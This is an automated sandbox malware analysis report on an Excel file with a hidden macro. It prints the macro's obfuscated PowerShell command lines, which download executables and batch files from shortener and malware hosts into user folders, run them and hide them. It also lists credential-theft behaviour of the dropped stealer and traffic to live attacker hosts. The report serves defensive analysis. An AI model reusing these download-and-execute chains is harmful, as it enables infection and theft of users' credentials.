Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report ul9kpUwYel.xls

Overview

General Information

Sample Name:ul9kpUwYel.xls
Analysis ID:337274
MD5:c2ca4d5f2632597023b6cf5b496fb4ed
SHA1:076f6120eb80059c41e8d731d59471a2e9d81ad8
SHA256:1ed66ae579df680aae0c4469e916cc97a943e9f600a4d55767755456d6079c75
Tags:SilentBuilderxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Powershell downloading file from url shortener site
Contains functionality to steal Internet Explorer form passwords
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Machine Learning detection for dropped file
Obfuscated command line found
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Yara detected Obfuscated Powershell
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2484 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • cmd.exe (PID: 2604 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2300 cmdline: powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2524 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 284 cmdline: powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2492 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2936 cmdline: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • attrib.exe (PID: 152 cmdline: 'C:\Windows\system32\attrib.exe' +s +h pd.bat MD5: C65C20C89A255517F11DD18B056CADB5)
    • cmd.exe (PID: 2320 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2460 cmdline: powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • cmd.exe (PID: 1924 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat'' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
          • mode.com (PID: 2420 cmdline: mode 18,1 MD5: 718E86CB060170430D4EF70EE39F93D4)
          • cmd.exe (PID: 952 cmdline: C:\Windows\system32\cmd.exe /c ver MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
          • cmd.exe (PID: 972 cmdline: Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • powershell.exe (PID: 2036 cmdline: powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe; MD5: 852D67A27E454BD389FA7F02A8CBE23F)
              • cr.exe (PID: 2240 cmdline: 'C:\Users\user\AppData\Roaming\cr.exe' MD5: 740E559929463320CB8E0403FD35A097)
    • cmd.exe (PID: 2848 cmdline: cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2860 cmdline: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
ul9kpUwYel.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x44bc2:$s1: Excel
  • 0x4135e:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
  • 0x12a6f:$r1: p^owersh^el^l
  • 0x12c98:$r1: p^owersh^el^l
  • 0x12f05:$r1: p^owersh^el^l
  • 0x130e2:$r1: p^owersh^el^l
  • 0x12a6f:$r2: p^owersh^el^l
  • 0x12c98:$r2: p^owersh^el^l
  • 0x12f05:$r2: p^owersh^el^l
  • 0x130e2:$r2: p^owersh^el^l
dump.pcapJoeSecurity_ObfuscatedPowershellYara detected Obfuscated PowershellJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Documents\pd.batSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
    • 0xd4:$r1: p^owersh^el^l
    • 0x2fd:$r1: p^owersh^el^l
    • 0x524:$r1: p^owersh^el^l
    • 0x701:$r1: p^owersh^el^l
    • 0xd4:$r2: p^owersh^el^l
    • 0x2fd:$r2: p^owersh^el^l
    • 0x524:$r2: p^owersh^el^l
    • 0x701:$r2: p^owersh^el^l
    C:\Users\user\Documents\pd.batJoeSecurity_ObfuscatedPowershellYara detected Obfuscated PowershellJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000011.00000002.2156606049.000000000370B000.00000004.00000001.sdmpSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
      • 0x1b0da:$r1: p^owersh^el^l
      • 0x1b303:$r1: p^owersh^el^l
      • 0x1b52a:$r1: p^owersh^el^l
      • 0x1b707:$r1: p^owersh^el^l
      • 0x1d78c:$r1: p^owersh^el^l
      • 0x1d9b5:$r1: p^owersh^el^l
      • 0x1dbdc:$r1: p^owersh^el^l
      • 0x1ddb9:$r1: p^owersh^el^l
      • 0x1e04c:$r1: p^owersh^el^l
      • 0x1e275:$r1: p^owersh^el^l
      • 0x1e49c:$r1: p^owersh^el^l
      • 0x1e679:$r1: p^owersh^el^l
      • 0x1b0da:$r2: p^owersh^el^l
      • 0x1b303:$r2: p^owersh^el^l
      • 0x1b52a:$r2: p^owersh^el^l
      • 0x1b707:$r2: p^owersh^el^l
      • 0x1d78c:$r2: p^owersh^el^l
      • 0x1d9b5:$r2: p^owersh^el^l
      • 0x1dbdc:$r2: p^owersh^el^l
      • 0x1ddb9:$r2: p^owersh^el^l
      • 0x1e04c:$r2: p^owersh^el^l

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Powershell downloading file from url shortener siteShow sources
      Source: Process startedAuthor: Joe Security: Data: Command: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat'), CommandLine: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat'), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2848, ProcessCommandLine: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat'), ProcessId: 2860
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', CommandLine: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2484, ProcessCommandLine: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', ProcessId: 2604
      Sigma detected: Hiding Files with Attrib.exeShow sources
      Source: Process startedAuthor: Sami Ruohonen: Data: Command: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, CommandLine: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, CommandLine|base64offset|contains: , Image: C:\Windows\System32\attrib.exe, NewProcessName: C:\Windows\System32\attrib.exe, OriginalFileName: C:\Windows\System32\attrib.exe, ParentCommandLine: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2936, ProcessCommandLine: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, ProcessId: 152

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Antivirus detection for URL or domainShow sources
      Source: http://chebo.discountmonumentcenter.com/vantuz_2021.exeAvira URL Cloud: Label: malware
      Multi AV Scanner detection for domain / URLShow sources
      Source: trashbininspector.funVirustotal: Detection: 8%Perma Link
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Roaming\cr.exeReversingLabs: Detection: 72%
      Multi AV Scanner detection for submitted fileShow sources
      Source: ul9kpUwYel.xlsVirustotal: Detection: 41%Perma Link
      Source: ul9kpUwYel.xlsMetadefender: Detection: 22%Perma Link
      Source: ul9kpUwYel.xlsReversingLabs: Detection: 34%
      Machine Learning detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Roaming\cr.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0040B831 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,24_2_0040B831
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00409D52 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,24_2_00409D52
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0041A507 __EH_prolog,_strlen,CryptStringToBinaryA,24_2_0041A507
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0040A753 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,24_2_0040A753
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0040908B __EH_prolog,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,LocalAlloc,BCryptDecrypt,BCryptCloseAlgorithmProvider,BCryptDestroyKey,24_2_0040908B
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004233DC CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,24_2_004233DC
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004235AF lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree,24_2_004235AF
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0040964F __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,24_2_0040964F
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004339BC lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlenA,24_2_004339BC
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0029362C CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,24_2_0029362C
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0028A757 __EH_prolog,_strlen,CryptStringToBinaryA,24_2_0028A757
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002937FF CredEnumerateW,CryptUnprotectData,LocalFree,AuditFree,24_2_002937FF
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0027989F __EH_prolog,wsprintfA,CryptUnprotectData,24_2_0027989F
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0027A9A3 __EH_prolog,wsprintfA,_wcsstr,_wcsstr,_wcsstr,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,24_2_0027A9A3
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0027BA81 __EH_prolog,wsprintfA,_wcsstr,_wcsstr,_wcsstr,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,24_2_0027BA81
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002A3C0C lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlen,24_2_002A3C0C
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00279FA2 __EH_prolog,wsprintfA,_wcsstr,CryptUnprotectData,LocalFree,24_2_00279FA2
      Source: unknownHTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49165 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49168 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.22:49174 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 104.18.58.219:443 -> 192.168.2.22:49176 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 104.18.58.219:443 -> 192.168.2.22:49177 version: TLS 1.0
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2145478746.0000000002AA0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2164368901.0000000002A50000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2153405530.000000001B420000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2189543252.00000000028F0000.00000002.00000001.sdmp
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043DCD2 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,24_2_0043DCD2
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0045F42D FindFirstFileExW,24_2_0045F42D
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043DCF2 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,24_2_0043DCF2
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043DE3D GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,24_2_0043DE3D
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002AE08D GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,24_2_002AE08D
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002CF67D FindFirstFileExW,24_2_002CF67D
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002ADF22 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,24_2_002ADF22
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002ADF42 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,24_2_002ADF42
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00434AFC __EH_prolog,GetLogicalDriveStringsA,24_2_00434AFC
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exeJump to behavior
      Source: global trafficDNS query: name: cutt.ly
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.22.1.232:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.22.1.232:443
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 08 Jan 2021 08:06:19 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Mon, 04 Jan 2021 21:24:49 GMTAccept-Ranges: bytesContent-Length: 565248Keep-Alive: timeout=5, max=75Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b2 d5 65 2a f6 b4 0b 79 f6 b4 0b 79 f6 b4 0b 79 e8 e6 8f 79 ed b4 0b 79 e8 e6 9e 79 ee b4 0b 79 e8 e6 88 79 97 b4 0b 79 d1 72 70 79 fd b4 0b 79 f6 b4 0a 79 93 b4 0b 79 e8 e6 81 79 f7 b4 0b 79 e8 e6 9f 79 f7 b4 0b 79 e8 e6 9a 79 f7 b4 0b 79 52 69 63 68 f6 b4 0b 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 17 b8 18 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 30 08 00 00 80 00 00 00 c0 37 04 b0 36 3f 04 00 d0 37 04 00 00 40 04 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 40 04 00 10 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 71 40 04 60 01 00 00 00 00 40 04 04 71 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 38 3f 04 18 00 00 00 88 f6 3f 04 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 c0 37 04 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 30 08 00 00 d0 37 04 00 28 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 80 00 00 00 00 40 04 00 74 00 00 00 2c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
      Source: global trafficHTTP traffic detected: GET /bat/scriptxls_bcb01d52-349f-4210-b1fc-2540a097ee09_fteenetx_wdexclusion.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /vantuz_2021.exe HTTP/1.1Host: chebo.discountmonumentcenter.comConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 195.201.225.248 195.201.225.248
      Source: Joe Sandbox ViewIP Address: 37.46.150.139 37.46.150.139
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
      Source: unknownHTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49165 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49168 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.22:49174 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 104.18.58.219:443 -> 192.168.2.22:49176 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 104.18.58.219:443 -> 192.168.2.22:49177 version: TLS 1.0
      Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
      Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
      Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
      Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
      Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
      Source: global trafficHTTP traffic detected: GET /bat/scriptxls_bcb01d52-349f-4210-b1fc-2540a097ee09_fteenetx_wdexclusion.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /vantuz_2021.exe HTTP/1.1Host: chebo.discountmonumentcenter.comConnection: Keep-Alive
      Source: unknownDNS traffic detected: queries for: cutt.ly
      Source: powershell.exe, 00000007.00000002.2144318291.00000000023C0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2162227868.0000000002480000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2144277775.00000000024C0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: powershell.exe, 00000007.00000002.2144318291.00000000023C0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2162227868.0000000002480000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2144277775.00000000024C0000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2188981999.0000000002500000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
      Source: powershell.exe, 0000000A.00000002.2160741511.00000000003FE000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.2143296812.000000000032E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
      Source: powershell.exe, 0000000A.00000002.2160741511.00000000003FE000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.2143296812.000000000032E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
      Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
      Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004254E5 __EH_prolog,GdiplusStartup,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,_mbstowcs,GdipSaveImageToFile,DeleteObject,GdiplusShutdown,24_2_004254E5
      Source: C:\Users\user\AppData\Roaming\cr.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15AJump to dropped file

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
